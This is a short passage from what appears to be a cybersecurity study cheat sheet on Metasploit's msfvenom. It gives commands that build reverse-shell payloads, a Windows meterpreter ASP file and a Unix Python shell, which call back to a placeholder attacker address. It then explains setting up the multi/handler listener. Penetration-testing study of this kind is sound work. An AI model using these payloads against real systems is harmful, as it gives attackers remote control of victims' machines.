IOxCyber/CyberEssentials/Metasploit/msfvenom.md

 > msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.X.X LPORT=XXXX -f asp > rev_shell.asp
 - Python
 > msfvenom -p cmd/unix/reverse_python LHOST=10.10.X.X LPORT=XXXX -f raw > rev_shell.py

+### Note: All of the examples above are reverse payloads.
+This means we need to have the exploit/multi/handler module listening on attacking/local machine to work as a handler, need to set up the handler accordingly with the payload, LHOST and LPORT parameters.
+These values will be the same we have used when creating the msfvenom payload.